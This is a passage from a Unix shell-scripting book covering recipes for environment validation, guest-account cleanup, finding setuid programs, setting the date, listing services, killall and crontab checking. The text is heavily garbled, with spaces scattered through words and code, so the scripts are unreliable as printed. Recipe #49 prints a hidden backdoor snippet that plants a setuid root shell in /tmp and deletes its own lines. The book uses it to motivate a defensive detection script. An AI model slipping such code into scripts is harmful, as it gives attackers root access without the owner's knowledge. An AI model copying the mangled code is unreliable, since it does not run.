# Gi v en a com ma nd a nd t he PA T H, t r y t o fi nd t h e co m ma n d. R e tu rn s
# 1 i f f ou nd, 0 if not.
Not e th a t th i s t em po r ar il y m o di fi e s th e
# IF S in pu t f ie ld s epar ator b ut r e sto r e s it u p on c o mp l et io n .
c md= $ 1
pat h= $2
re tval= 0
o ldI F S=$ IF S; IF S=": "

f or d ire ct ory i n $p ath


do
if [ - x $di re ctor y/$c md ] ; th e n
r etv al =1
# if we're her e , we f ou nd $ c md i n $ d ir ec t or y
fi
d one
I FS= $ old IF S
r etu r n $ re tva l

v al ida t e()
{
v arn a me= $1

v arva lue= $2

i f [ ! - z $va rv alue ] ; then


if [ " ${ var va lue% ${va rvalu e #?} } " = " / " ] ; t he n
i f [ ! -x $ varv alue ] ; t hen
ec ho "* * $var name set t o $ v a rva l u e, b ut I ca n no t f in d e xe c ut ab l e. "
er ro rs= $( ( $e rror s + 1 ))
fi
el s e
i f i n_ pat h $var valu e $PA T H ; t hen
ec ho "* * $var name set t o $ v a rva l u e, b ut I ca n no t f in d i t i n PA T H. "
er ro rs= $( ( $e rror s + 1 ))
fi
fi
fi

# ## ### # Be gi nni ng of actu al sh e ll s c rip t ## ## ## #


i f [ ! -x ${ SHE LL :?"C anno t pro c eed w ith o u t SH EL L b ei n g d ef in e d. "} ] ; t he n
e cho "** S HEL L set to $ SHELL , bu t I c a n no t fi n d th a t e xe cu t ab le . "
e rro r s=$ (( $e rr ors + 1 ))
fi
i f [ ! -d ${ HOM E: ?"Yo u ne ed to hav e you r HO ME s e t to yo u r ho m e di r ec to r y" } ]

t he n
e cho "** H OME s et t o $H OME, b ut i t 's n o t a di r ec to r y. "
e rro r s=$ (( $e rr ors + 1 ))
fi
# O ur f irs t int er esti ng t est: a re a l l t h e p at hs in P A TH va li d ?
o ld IFS = $IF S; IF S= ":"

# IFS is t h e f i e ld s ep a ra to r . W e' ll ch an g e to ': '

f or di r ect or y i n $PAT H
do
i f [ ! - d $di re ctor y ] ; the n
e cho " ** PA TH c onta ins i n val i d di r e ct or y $ di re c to r y"
e rro rs =$( ( $err ors + 1 ) )
fi
d on e
I FS =$o l dIF S

# rest o re v a lue f or r es t o f s cr i pt

# T he f oll ow ing v aria bles shou l d e a c h b e a fu ll y q ua l if i ed p a th ,


# b ut t hey m ay be eit her undef i ned o r a p ro gn am e .
#
Ad d ad di tio na l va riab les a s ne c e ssa r y f or
# y our sit e and u ser comm unity .
v al ida t e " ED ITO R" $ED ITOR
v al ida t e " MA ILE R" $MA ILER
v al ida t e " PA GER " $PA GER
# A nd, fin al ly, a dif fere nt en d ing d epe n d in g on wh et h er er ro r s > 0
i f [ $ e rro rs -g t 0 ] ; th en
e cho "Er ro rs en coun tere d. Pl e ase n oti f y s ys ad m in f o r h el p. "
e ls e
e cho "Yo ur en vi ronm ent check s ou t fin e . "
fi
e xi t 0

How It Works
The tests performed by this script aren't overly complex. To check that all the directories in P AT H are valid, the code
steps through each directory to ensure that it exists. Notice that the internal field separator (IFS) had to be changed to
a colon so that the script would properly step through all of the P A TH directories. By convention, the PA T H variable
uses a colon to separate each of its directories, as shown here:
$ e cho $PA TH
/ bi n/: / sbi n: /us r/ bin: /sw/ bin:/ u sr/ X 1 1R6 / b in :/ us r /l oc a l/ m yb in
To validate that the environment variable values are valid, the val i da t e( ) function first checks to see if each value
begins with a /. If it does, the function checks to see if the variable is an executable. If it doesn't begin with a /, the
script calls the i n_ pat h( ) function to see if the program is found in one of the directories in the current P AT H .
The most unusual aspects of this script are its use of default values within some of the conditionals and its use of
variable slicing. Its use of default values in the conditionals is exemplified by the following:
i f [ ! -x ${ SHE LL :?"C anno t pro c eed w ith o u t SH EL L b ei n g d ef in e d. "} ] ; t he n
The notation ${ var na me: ?" erro rMes sa ge " } can be read as if varname exists, substitute its value; otherwise,
fail with the error errorMessage.
The variable slicing notation, ${ varv alue% $ {va r v alu e # ?} }, is the POSIX sub-string function, producing only
the first character of the variable v arva lue. In this script, it's used to ascertain whether an environment variable has
a fully qualified filename (one starting with / and specifying the path to the binary).
If your version of Unix/Linux doesn't support either of these notations, they can be replaced in a straightforward
fashion. For example, instead of ${S HELL: ? No S h ell } you could substitute
i f [ - z $S HE LL ] ; th en
e cho "No S hel l" >&2 ; ex it 1
fi

And instead of {va rv alu e% ${va rval ue #? } } , you could use the following code to accomplish the same result:
$ (e cho $va rv alu e | cu t -c 1)

Running the Code


This is code that users can run to check their own environment. There are no starting arguments.

The Results
$ v ali d ato r
* * PAT H co nt ain s inva lid direc t ory / usr / l oc al /m y bi n
* * MAI L ER se t t o /usr /loc al/bi n /el m , bu t I ca nn o t fi n d e xe cu t ab le .
E rr ors enc ou nte re d. P leas e not i fy s y sad m i n fo r h el p.

#48 Cleaning Up After Guests Leave


Although many sites disable the guest user for security reasons, others do have a guest account (often with a trivially
guessable password) to allow people from other departments to access the network. It's a useful account, but there's
one big problem: With multiple people sharing the same account, it's not uncommon for someone to experiment with
commands, edit .r c files, add subdirectories, and so forth, thereby leaving things messed up for the next user.
This script addresses the problem by cleaning up the account space each time a user logs out from the guest account,
deleting any files or subdirectories created, removing all dot files, and then rebuilding the official account files, copies of
which are stored in a read-only archive tucked into the guest account in the .. t em pl a te directory.

The Code
# !/ bin / sh
# f ixg u est - Cl ea ns u p th e gue s t a c c oun t du ri ng th e l og o ut p r oc es s .
# D on' t tr us t e nv iron ment vari a ble s : re f e re nc e r ea d- o nl y s ou r ce s
i am =$( w hoa mi )
m yh ome = "$( gr ep "^ ${ia m}:" /etc / pas s w d | c ut - d: -f 6) "
# * ** D o N OT ru n this scr ipt o n a r e gul a r u se r a cc ou n t!
i f [ " $ iam " != "g uest " ] ; the n
e cho "Er ro r: yo u re ally don' t wa n t to r un f ix g ue st on th is ac co u nt ." >& 2
e xit 1
fi
i f [ ! -d $m yho me /..t empl ate ] ; t h e n
e cho "$0 : no te mpla te d irect o ry f o und f or r eb u il di n g. " > &2
e xit 1
fi
# R emo v e a ll fi le s an d di recto r ies i n t h e h om e a cc ou n t
c d $my h ome
r m -rf * $ (f ind . -na me " .[a-z A -Z0 - 9 ]*" - pr in t)
# N ow t he on ly th ing pres ent s h oul d be t h e .. te m pl at e d i re ct o ry
c p -Rp ..t em pla te /* .
e xi t 0

How It Works
For this script to work correctly, you'll want to create a master set of template files and directories within the guest
home directory, tucked into a new directory called . .te m p lat e . Change the permissions of the . . te mp l at e
directory to read-only, and then within .. temp l a te ensure that all the files and directories have the proper
ownership and permissions for user gue st.

Running the Code


A logical time to run the fi xg uest script is at logout by invoking it in the .l o go ut file (which works with most
shells, though not all). It'd doubtless save you lots of complaints from users if the login script output a message like the
following:
N ot ice : Al l fil es are pur ged f r om t h e g u e st a cc o un t i mm e di at e ly
u po n l o gou t, so p leas e do n't s a ve a n yth i n g he re yo u n ee d . If yo u
w an t t o sa ve so me thin g, e mail i t t o you r ma in a c co un t i n st ea d .
Y ou 've bee n war ne d!
However, because some guest users might be savvy enough to tinker with the . l og ou t script, it would be worthwhile
to invoke the fi xg ues t script from cron too. Just make sure no one's logged in to the account when it runs!

The Results
There are no visible results to running this program, except that the guest home directory will be restored to mirror the
layout and files in the ..t em plat e directory.

Chapter 6: System Administration: System Maintenance


The most common use of shell scripts is to help with Unix or Linux system administration. There's an obvious reason
for this, of course: Administrators are often the most knowledgeable Unix users on the system, and they also are
responsible for ensuring that things run smoothly and without a glitch. But there might be an additional reason for the
emphasis on shell scripts within the system administration world. My theory? That system administrators and other
power users are the people most likely to be having fun with their system, and shell scripts are quite fun to develop
within the Unix environment!
And with that, let's continue exploring how shell scripts can help you with system administration tasks.

#49 Tracking Set User ID Applications


There are quite a few ways that ruffians and digital delinquents can break into a Unix system, whether they have an
account or not, but few ways are as easy for them as finding an improperly protected s e tu id or s et gi d command.
In a shell script, for example, adding a few lines of code can create a s e tu id shell for the bad guy once the code is
invoked by the unsuspecting roo t user:
i f [ " $ {US ER :-$ LO GNAM E}" = "ro o t" ] ; t h e n # RE M OV EM E
c p / b in/ sh /t mp /.ro otsh ell
# RE M OV EM E
c how n ro ot /t mp /.ro otsh ell
# RE M OV EM E
c hmo d -f 4 777 / tmp/ .roo tshel l
# RE M OV EM E
g rep -v "# RE MO VEME " $0 > /t m p/j u n k
# RE M OV EM E
m v / t mp/ ju nk $ 0
# R EM O VE ME
fi
# RE M OV EM E
Once this script is run by ro ot , a shell is surreptitiously copied into / t mp as . r oo t sh el l and is made s et ui d
r oo t for the cracker to exploit at will. Then the script causes itself to be rewritten to remove the conditional code
(hence the # RE MO VEM E at the end of each line), leaving essentially no trace of what the cracker did.
The code snippet just shown would also be exploitable in any script or command that runs with an effective user ID of
r oo t; hence the critical need to ensure that you know and approve of all s et u id r o ot commands on your
system. Of course, you should never have scripts with any sort of se t ui d or s e tg i d permission for just this reason,
but it's still smart to keep an eye on things.

The Code
# !/ bin / sh
# f ind s uid - Ch ec ks a ll S UID f i les o r p r o gr am s t o se e i f t he y 'r e w ri te a bl e,
# a nd o utp ut s t he mat ches in a fri e n dly a nd u se f ul f o rm a t.
m ti me= " 7"
v er bos e =0

# how far back (in d ays ) to c he c k fo r m o di fi e d cm d s


# by defa ult, l et' s be q u ie t ab o ut t h in g s

i f [ " $ 1" = "-v " ] ; then


v erb o se= 1
fi
f or ma t ch in $( fi nd / -ty pe f - per m +40 0 0 - pr in t )
do
i f [ -x $m atc h ] ; then
ow n er= "$ (ls - ld $ matc h | a w k ' { p rin t $3 }' )"
pe r ms= "$ (ls - ld $ matc h | c u t - c 5 -10 | g re p ' w' )"
if [ ! - z $ pe rms ] ; then
e cho " *** * $mat ch ( write a ble a nd s e tu id $ o wn er ) "
el i f [ ! -z $ (fin d $m atch - mti m e -$ m t im e -p r in t) ] ; t he n
e cho " *** * $mat ch ( modif i ed w i thi n $m ti me da ys an d s et u id $ o wn er ) "
el i f [ $ ver bo se - eq 1 ] ; t hen
l ast mo d=" $( ls - ld $ match | a w k '{ p r in t $6 , $ 7, $8 } ') "
e cho "
$mat ch ( setui d $o w n er, l as t mo d if ie d $ l as tm o d) "
fi

fi
d on e
e xi t 0

How It Works
This script checks all s et uid commands on the system to see if they're group-or world-writable and whether they've
been modified in the last $mt ime days.

Running the Script


This script has one optional argument: -v produces a verbose output that lists every se tu i d program encountered
by the script. This script should probably be run as roo t , but it can be run as any user that has access permission to
the key directories.

The Results
I've dropped a "hacked" script somewhere in the system. Let's see if fi nd s ui d can find it:
$ f ind s uid
* ** * / v ar/ tm p/. sn eaky /edi tme ( w rit e a ble a nd s et u id r o ot )
There it is!
$ l s - l /v ar /tm p/ .sne aky/ editm e
- rw srw x rwx
1 r oo t w heel
259 8 8 J u l 13 1 1: 50 / v ar /t m p/ . sn ea k y/ ed i tm e
A huge hole just waiting for someone to exploit.

#50 Setting the System Date


Conciseness is the heart of Unix and has clearly affected its evolution in quite a dramatic manner. However, there are
some areas where this zeal for succinctness can drive a sysadmin batty. One of the most common annoyances in this
regard is the format required for resetting the system date, as shown by the d at e command:
u sa ge: dat e [[[ [[ cc]y y]mm ]dd]h h ]mm [ . ss]
Trying to figure out all the square brackets can be baffling, without even talking about what you do or don't need to
specify. Instead, a shell script that prompts for each relevant field and then builds the compressed date string is a sure
sanity saver.

The Code
# !/ bin / sh
# s etd a te - Fri en dly fron t end to t h e d a t e co mm a nd .
# D ate wan ts : [ [[ [[cc ]yy] mm]dd ] hh] m m [.s s ]
a sk val u e()
{
# $1 = f ie ld na me, $2 = defa u lt v a lue , $3 = m a x va l ue ,
# $4 = r eq uir ed cha r/di git l e ngt h

e cho -n "$ 1 [ $2 ] : "


r ead ans we r
i f [ ${a ns wer := $2} -gt $3 ] ; th e n
ec h o " $0 : $ 1 $ans wer is in v ali d " ; e x i t 0
e lif [ " $( ( $ (e cho $ans wer | wc - c ) - 1 ) )" - l t $4 ] ; t he n
ec h o " $0 : $ 1 $ans wer is to o sh o r t: p l ea se s p ec if y $ 4 d ig i ts "; ex it 0
fi
e val $1= $a nsw er

e va l $ ( dat e "+n ye ar=% Y nm on=%m nda y = %d n h r= %H n m in =% M ")


a sk val u e
a sk val u e
a sk val u e
a sk val u e
a sk val u e

y ea r $ ny ear 3000 4
m on th $n mon 12 2
d ay $n da y 31 2
h ou r $ nh r 24 2
m in ute $ nmin 59 2

s qu ish e d=" $y ear $m onth $day $hour $ min u t e"


# o r, i f y ou 're r unni ng a Linu x sy s t em:
# s qui s hed =" $mo nt h$da y$ho ur$mi n ute $ y ear "
e ch o " S ett in g d at e to $sq uishe d . Y o u mi g h t ne ed to e n te r y ou r s ud o p as s wo rd : "
s ud o d a te $s qui sh ed
e xi t 0

How It Works
To make this script as succinct as possible, I use the following e va l function to accomplish two things.
e va l $ ( dat e "+n ye ar=% Y nm on=%m nda y = %d n h r= %H n m in =% M ")
First, this line sets the current date and time values, using a da t e format string, and second, it sets the values of the
variables nye ar , nm on, nday , nh r, and nm in , which are then used in the simple a sk v al ue ( ) function to
prompt for and test values entered. Using the e v al function to assign values to the variables also sidesteps any
potential problem of the date rolling over or otherwise changing between separate invocations of the a sk v al ue ( )
function, which would leave the script with inconsistent data. For example, if a sk v al ue got month and day values at
23:59.59 and then hour and minute values at 0:00:02, the system date would actually be set back in time 24 hours, not
at all the desired result.
This is one of various problems in working with the d a te command that can be subtle but problematic. With this script,

if you specify the exact time during the prompts but you then have to enter a s ud o password, you could end up setting
the system time to a few seconds in the past. It's probably not a problem, but this is one reason why networkconnected systems should be working with Network Time Protocol (NTP) utilities to synchronize their system against
an official time-keeping server.
Learn more about network time

You can start down the path of network time synchronization


by reading up on ti m ed ( 8) on your system.

Running the Script


Notice how this script uses the sudo command to run the actual date reset as r oo t. By entering an incorrect
password to s ud o, you can experiment with this script without worrying about any strange or unexpected results.

The Results
$ s et- d ate
y ea r [ 2 003 ] :
m on th [ 07] :
d ay [0 8 ] :
h ou r [ 1 6] :
m in ute [53 ] : 4 8
S et tin g da te to 2 0030 7081 648. Y ou m i ght n ee d to en te r y o ur s u do p a ss wo r d:
p as swd :
$

#51 Displaying Which Services Are Enabled


The first generation of Unix systems had a variety of system daemons, each of which listened to a specific port and
responded to queries for a specific protocol. If you had a half-dozen services, you'd have a half-dozen daemons
running. As Unix capabilities expanded, however, this wasn't a sustainable model, and an berdaemon called i ne t d
was developed. The ine td service can listen to a wide range of different channels simultaneously, launching the
appropriate daemon to handle each request as needed. Instead of having dozens of daemons running, it has only one,
which spawns service-specific daemons as needed. In more recent years, a new, more sophisticated successor of
i ne td has become popular, called xine td .
While the original i net d service has a single configuration file (/e t c/ i ne t d. c on f) that a sysadmin can easily
scan to discover which services are on and which are off, xi n e td works with a directory of configuration files, one
per service. This makes it quite difficult to ascertain which services are on and which are off, unless a script is utilized.
A typical x ine td configuration file looks like this:
$ c at / etc /x ine td .d/f tp
s er vic e ft p
{
di sa ble
= yes
so ck et_ ty pe
= stre a m
wa it
= no
us er
= root
se rv er
= /usr / lib e x ec/ f t pd
se rv er_ ar gs
= -l
gr ou ps
= yes
fl ag s
= REUS E
}
The most important line in this configuration file contains the value of d is ab l e. If it's set to ye s, the service is not
enabled on the system, and if it's set to no , the service is available and configured as indicated in the file.
This particular script checks for the configuration files of both i n et d and xi ne t d and then displays all of the
services that are enabled for the daemon that exists. This script also uses the p s command to check whether one of
the daemons is in fact running.

The Code
# !/ bin / sh
# e nab l ed - Che ck s wh ethe r ine t d a n d xi n e td a re av ai l ab l e on th e s ys te m ,
# a nd s how s whi ch of thei r ser v ice s are e na bl ed .
i co nf= " /et c/ ine td .con f"
x co nf= " /et c/ xin et d.co nf"
x di r=" / etc /x ine td .d"
i f [ - r $i co nf ] ; th en
e cho "Se rv ice s enab led in $i c onf a re: "
g rep -v '^ #' $i conf | a wk '{ p rin t " " $1 }'
e cho ""
i f [ "$( ps -a ux | g rep inetd | e g r ep - v E '( xi n et |g r ep ) ') " = " " ] ; t h en
ec h o " ** wa rn ing: ine td do e s n o t ap p e ar t o b e ru n ni n g"
fi
fi
i f [ - r $x co nf ] ; th en
# Do n 't ne ed to loo k in xini e td. c o nf, j us t kn o w it ex i st s
e cho "Se rv ice s enab led in $x d ir a r e:"
f or s erv ic e i n $xdi r/*
do
if ! $ (g rep d isab le $ servi c e | g rep ' ye s' > /d ev / nu l l) ; th en
e cho - n " "
b ase na me $s ervi ce
fi

d one

fi

i f ! $(p s -au x | gr ep x inetd | g r e p - v 'g re p' > /d e v/ n ul l) ; th e n


ec h o " ** wa rn ing: xin etd d o es n o t a p p ea r to be r u nn i ng "
fi

e xi t 0

How It Works
Examination of the script will show that the fo r loop in the second section makes it easy to step through x i ne td
configuration files to see which have d isabl e set to no . Any of those must therefore be enabled and are worth
reporting to the user.

Running the Code


This script has no arguments and should be run as r oot to ensure that permission is available to examine the
administrative directories within /etc .

The Results
$ e nab l ed
S er vic e s e na ble d in / etc/ xinet d .d a r e:
e cho
r syn c
s gi_ f am
t ime

Hacking the Script


Most systems have the / etc /xine td.d files as world-readable, but you don't want these files writable by anyone
other than their owner (otherwise, a malicious user could redefine the server binary to one that offered a back door into
the system). The following logic to ensure that the configuration files are not world-writable would be a useful addition
to the script:
i f ! $ ( ls -l $s er vice | c ut -c 4 -9 | gre p 'w ' > / de v/ n ul l ) ; t he n
ech o "W ar nin g: Ser vice conf i gur a t ion f il e $s e rv ic e i s w or l d- wr i ta bl e ."
fi
To sidestep security problems and other errors, you could also refine the script by having it check the permissions and
existence of all server binaries.

#52 Killing Processes by Name


Linux and some Unixes have a very helpful command called k i l l a l l , which allows you to kill all running applications
that match a specified pattern. It can be quite helpful when you want to kill nine m i n g e t t y daemons, or even just to
send a SI GHU P signal to xi n etd to prompt it to reread its configuration file. Systems that don't have k i l l a l l can
emulate it in a shell script, built around ps for identification of matching processes and k i l l to send the specified
signal.
The tricky part of the script is that the output format from p s varies significantly from OS to OS. For example, consider
how differently Mac OS X and Red Hat Linux show running processes in the default p s output:
O S X $ ps
P I D T T S TAT
TIME CO M M A N D
4 8 5 st d S
0: 0 0.86 -b a s h ( b a s h )
581 p2 S
0: 0 0.01 -b a s h ( b a s h )
RHL9 $ ps
P I D TT Y
T I ME C MD
8 0 6 5 pt s/4
0 0:00 : 00 b ash
1 2 6 1 9 pt s/4
0 0:00 : 00 p s
Worse, rather than model its p s command after a typical Unix command, the GNU p s command accepts BSD-style
flags, SYSV-style flags, and GNU-style flags. A complete mishmash!
Fortunately, some of these inconsistencies can be sidestepped in this particular script by using the - c u flag, which
produces consistent output that includes the owner of the process, the command name (as opposed to - b a s h
( b a s h) , as in the default Mac OS X output just shown), and the process ID, the lattermost of which is what we're
really interested in identifying.

The Code
# ! / b in /s h
# k i ll al l - Send s the spec ifi e d s i g n a l t o a l l p r o c e s s e s t h a t m a t c h a
#
sp ec ifi c pro c ess n ame.
# B y d ef aul t it o nly k ills pr o c e s s e s o w n e d b y t h e s a m e u s e r , u n l e s s
#
yo u' re r oot. Use - s SI GNA L t o s p e c i f y a s i g n a l t o s e n d t o t h e p r o c e s s ,
#
-u u ser to s p ecif y the us e r , - t t t y t o s p e c i f y a t t y ,
#
an d -n t o on l y re p ort wha t ' d b e d o n e , r a t h e r t h a n d o i n g i t .
s i g n al =" -IN T "
# def a ult sig n a l
u s e r =" "
t t y=""
do n othi ng= 0
w h i l e ge top t s "s : u:t: n " op t; d o
c a se " $op t " in
# N o te t h e tr i ck b elo w : k i l l w a n t s - S I G N A L b u t w e ' r e a s k i n g
# f o r SI G NAL s o we sl i p t h e ' - ' i n a s p a r t o f t h e a s s i g n m e n t
s ) sig n al=" - $OPT A RG";
;;
u ) if [ ! - z "$t t y" ] ; t h e n
e cho " $0: e rror : - u a n d - t a r e m u t u a l l y e x c l u s i v e . " > & 2
e xit 1
fi
us e r=$O P TARG ;
;;
t ) if [ ! - z "$u s er" ] ; t h e n
e cho " $0: e rror : - u a n d - t a r e m u t u a l l y e x c l u s i v e . " > & 2
e xit 1
fi
tty = $2;
;;
n ) don o thin g =1;
;;
? ) ech o "Us a ge: $ 0 [- s s i g n a l ] [ - u u s e r | - t t t y ] [ - n ] p a t t e r n " > & 2
exi t 1
e s ac
done
s h i f t $( ( $ O PTIN D - 1 ))
i f [ $ # -eq 0 ] ; the n
e c ho " Usa g e: $ 0 [-s sign al] [ - u u s e r | - t t t y ] [ - n ] p a t t e r n " > & 2
e x it 1
fi
i f [ ! - z " $ tty" ] ; t hen
p i ds =$ (ps cu - t $tt y | a wk " / $ 1 $ / { p r i n t \ $ 2 } " )

e l i f [ ! -z "$us e r" ] ; th en
p i ds =$ (ps cu - U $us e r | awk " / $ 1 $ / { p r i n t \ $ 2 } " )
else
p i ds =$ (ps cu - U ${U S ER:- LOG N A M E } | a w k " / $ 1 $ / { p r i n t \ $ 2 } " )
fi
i f [ - z "$p i ds" ] ; t h en
e c ho " $0: no p r oces s es m atc h p a t t e r n $ 1 " > & 2 ; e x i t 1
fi
f o r pi d in $ pids
do
# Se nd ing sign a l $s i gnal to p r o c e s s i d $ p i d : k i l l m i g h t
# st il l c o mpla i n if the pro c e s s h a s f i n i s h e d , t h e u s e r d o e s n ' t
# ha ve pe r miss i on, e tc., bu t t h a t ' s o k a y .
i f [ $ don o thin g -eq 1 ] ; t h e n
ec ho "k i ll $ s igna l $pi d"
e l se
ki ll $s i gnal $pid
fi
done
exit 0

How It Works
Because this script is so aggressive, I've put some effort into minimizing false pattern matches, so that a pattern like
s h won't match output from ps that contains b a s h or v i c r a s h t e s t . c , or other values that embed the pattern.
This is done by the pattern-match prefix on the a w k command:
a w k "/ $ 1$/ { pr i nt \ $ 2 }"
Left-rooting the specified pattern, $1 , with a leading space and right-rooting the pattern with a trailing $ , causes the
script to search for the specified pattern ' sh ' in p s output as ' s h $ ' .

Running the Script


This script has a variety of starting flags that let you modify its behavior. The - s s i g n a l flag allows you to specify a
signal other than the default interrupt signal, S I G I N T , to send to the matching process or processes. The - u u s e r
and -t t ty flags are useful primarily to the r o o t user in killing all processes associated with a specified user or
TTY device, respectively. And the -n flag gives you the option of having the script report what it would do without
actually sending any signals. Finally, a pattern must be specified.

The Results
To kill all the c smou n t processes on my Mac OS X system, I can now use the following:
$ . / ki ll all -n c s moun t
k i l l - IN T 1 2 92
k i l l - IN T 1 2 96
k i l l - IN T 1 3 06
k i l l - IN T 1 3 10
k i l l - IN T 1 3 18

Hacking the Script


There's an unlikely, though not impossible, bug in this script. To match only the specified pattern, the a w k invocation
outputs the process ID only of processes that match the pattern plus a leading space that occurs at the end of the input
line. However, it's theoretically possible to have two processes running, one called, say, b a s h and the other
e m u l at e bas h . If kil l all is invoked with b a s h as the pattern, both of these processes will be matched,
although only the former is a true match. Solving this to give consistent cross-platform results would prove quite tricky.
If you're motivated, you could also write a script based heavily on the k i l l a l l script that would let you r e n i c e
jobs by name, rather than just by process ID. The only change required would be to invoke r e n i c e rather than
kill.

#53 Validating User crontab Entries


One of the most helpful facilities in Unix is cro n , with its ability to schedule jobs at arbitrary times in the future,
recurring every minute, every few hours, monthly, or annually. Every good system administrator has a Swiss army knife
of scripts running from the cr ontab file.
However, the format for entering c ron specifications is a bit tricky, and the cr o n fields have numeric values, ranges,
sets, and even mnemonic names for days of the week or months. What's worse is that the c r on ta b program
generates insufficient error messages when scanning in a cr o n file that might be incorrectly structured.
For example, specify a day of the week with a typo, and cro n t ab reports
" /t mp/ c ron ta b.D j7 Tr4v w6R" :9: b a d d a y -of - w ee k
c ro nta b : e rr ors i n cr onta b fil e , c a n 't i n st al l
In fact, there's a second error in the sample input file, on line 12, but c ro n ta b is going to force us to take the long
way around to find it in the script because of its poor error-checking code.
Instead of doing it cro nt ab's way, a somewhat lengthy shell script can step through the c r on ta b files, checking the
syntax and ensuring that values are within reasonable ranges. One of the reasons that this validation is possible in a
shell script is that sets and ranges can be treated as individual values. So to test whether 3 1 1 or 4, 6, 9 are
acceptable values for a field, simply test 3 and 11 in the former case, and 4, 6, and 9 in the latter.

The Code
# !/ bin / sh
# v eri f ycr on - Ch ecks a c ronta b fi l e to e ns ur e t ha t i t' s
#
f o rma tt ed pr oper ly.
Expe c ts s t and a r d cr on no ta t io n o f
#
mi n hr do m mo n do w CMD
#
w h ere m in is 0-5 9, h r is 0 -23 , dom i s 1- 31 , m on is 1- 12 (o r n am es )
#
a n d d ow is 0 -7 ( or n ames) . F i e lds c an b e r an ge s ( a -e ), li st s
#
s e par at ed by com mas (a,c, z ), o r an a st er is k . No t e t ha t t he s t ep
#
v a lue n ota ti on o f Vi xie c r on ( e .g. , 2- 6/ 2) is n o t s up po r te d b y th i s sc r ip t.
v al idN u m()
{
# Re t urn 0 if v alid , 1 if no t . S p e cif y nu mb er an d m ax v al ue as a r gs
n um= $ 1
m ax= $2

i f [ "$n um " = " X" ] ; t hen


re t urn 0
e lif [ ! - s $ (e cho $num | se d 's / [ [:d i g it :] ]/ / g' ) ] ; th en
re t urn 1
e lif [ $ nu m - lt 0 - o $n um -g t $m a x ] ; th en
re t urn 1
e lse
re t urn 0
fi

v al idD a y()
{
# Re t urn 0 if a val id d aynam e , 1 o the r w is e

c ase $(e ch o $ 1 | tr '[: upper : ]' ' [ :lo w e r: ]' ) i n


su n *|m on *|t ue *|we d*|t hu*|f r i*| s a t*) r et ur n 0 ; ;
X) ret ur n 0 ; ; # spec ial c a se - it' s an " *"
*) ret ur n 1
e sac

v al idM o n()
{
# Re t urn 0 if a val id m onth n ame , 1 o t h er wi se

cas e $( ec ho $1 | t r '[ :uppe r :]' ' [:l o w er :] ') in


j a n*| fe b*| ma r*|a pr*| may|j u n*| j u l*| a u g* ) re t ur n 0
s e p*| oc t*| no v*|d ec*)
re t ur n 0
X ) re tu rn 0 ;; # spe cial c ase , it' s an " *"
* ) re tu rn 1
;;
esa c

;;
;;

f ix var s ()
{
# Tr a nsl at e a ll '*' int o 'X' to b y pas s sh el l e xp an s io n h as s le s
# Sa v e o ri gin al inp ut a s "so u rce l i ne" f or e rr o r me s sa g es

s our c eli ne ="$ mi n $h our $dom $ mon $ dow $ co mm an d "


min = $(e ch o " $m in" | tr '*' ' X')
h our = $(e ch o " $h our" | t r '*' 'X' )
dom = $(e ch o " $d om" | tr '*' ' X')
mon = $(e ch o " $m on" | tr '*' ' X')
dow = $(e ch o " $d ow" | tr '*' ' X')

i f [ $ # -n e 1 ] | | [ ! -r $1 ] ; t h e n
e cho "Us ag e: $0 use rcro ntabf i le" > &2; e xi t 1
fi
l in es= 0 en tr ies =0 tot aler rors= 0
w hi le r ead m in ho ur d om m on do w co m m and
do
l ine s ="$ (( $li ne s + 1))"
e rro r s=0
i f [ -z "$ min " -o " ${mi n%${m i n#? } } " = " #" ] ; th en
co n tin ue
# not hing to c h eck
e lif [ ! - z $ (e cho ${mi n%${m i n#? } } | s e d 's /[ [ :d ig i t: ] ]/ /' ) ] ;
co n tin ue
# fir st c har n o t d i g it: s ki p!
fi

t he n

e ntr i es= "$ (($ en trie s + 1))"


f ixv a rs
# ### Bro ke n i nt o fi elds , all '*' r epl a c ed w it h ' X'
# Mi n ute c hec k
f or m ins li ce in $(e cho "$min " | s e d ' s / [, -] / / g' ) ; d o
if ! v al idN um $mi nsli ce 60 ; t h e n
e cho " Lin e ${li nes} : Inv a lid m inu t e v al ue \" $m i ns l ic e\ " "
e rro rs =1
fi
d one
# Ho u r c he ck
f or h rsl ic e i n $(ec ho " $hour " | s e d ' s / [, -] / / g' ) ; d o
if ! v al idN um $hr slic e 24 ; th e n
e cho " Lin e ${li nes} : Inv a lid h our v al ue \ " $h rs l ic e \" "
e rro rs =1
fi
d one
# Da y of m ont h chec k
f or d oms li ce in $(e cho $dom | se d 's/ [ , -] / /g ' ) ; d o
if ! v al idN um $do msli ce 31 ; t h e n
e cho " Lin e ${li nes} : Inv a lid d ay o f m on th va lu e \ " $d om s li ce \ ""
e rro rs =1
fi

d one
# Mo n th ch eck
f or m ons li ce in $(e cho "$mon " | s e d ' s / [, -] / / g' ) ; d o
if ! v al idN um $mo nsli ce 12 ; t h e n
i f ! v ali dM on " $mon slice " ; t h en
ec ho "L in e ${ line s}: I n val i d mo n t h va lu e \ "$ m on s li ce \ ""
er ro rs= 1
fi
fi
d one
# Da y of w eek c heck
f or d ows li ce in $(e cho "$dow " | s e d ' s / [, -] / / g' ) ; d o
if ! v al idN um $do wsli ce 31 ; t h e n
i f ! v ali dD ay $ dows lice ; th e n
ec ho "L in e ${ line s}: I n val i d da y of w ee k v al u e \ "$ do w sl ic e \" "
er ro rs= 1
fi
fi
d one
i f [ $er ro rs -g t 0 ] ; then
ec h o " >> >> ${ line s}: $sour c eli n e "
ec h o " "
to t ale rr ors =" $(( $tot alerr o rs + 1 ) ) "
fi
d on e < $1
e ch o " D one . Fou nd $to tale rrors err o r s i n $e nt ri e s cr o nt a b en t ri es . "
e xi t 0

How It Works
The greatest challenge in getting this script to work is sidestepping problems with the shell wanting to expand the field
value * . An asterisk is perfectly acceptable in a c r on entry, and indeed is quite common, but give one to a backtick
command and it'll expand to the files in the current directory definitely not a desired result. Rather than puzzle
through the combination of single and double quotes necessary to solve this problem, it proves quite a bit simpler to
replace each asterisk with an X, which is what the f ixv a r s function accomplishes.
Also worthy of note is the simple solution to processing comma-and dash-separated lists of values. The punctuation is
simply replaced with spaces, and each value is tested as if it were a stand-alone numeric value. That's what the $ ()
sequence does in the fo r loops:
$ (e cho "$d ow " | s ed ' s/[, -]/ / g ')
With this in the code, it's then simple to step through all numeric values, ensuring that each and every one is valid and
within the range for that specific cron tab field parameter.

Running the Script


This script is easy to run: Just specify the name of a cro n t ab file as its only argument. To work with an existing
c ro nta b file, do this:
$ c ron t ab -l > my .cro ntab
$ v eri f ycr on my .c ront ab
$ r m m y .cr on tab

The Results
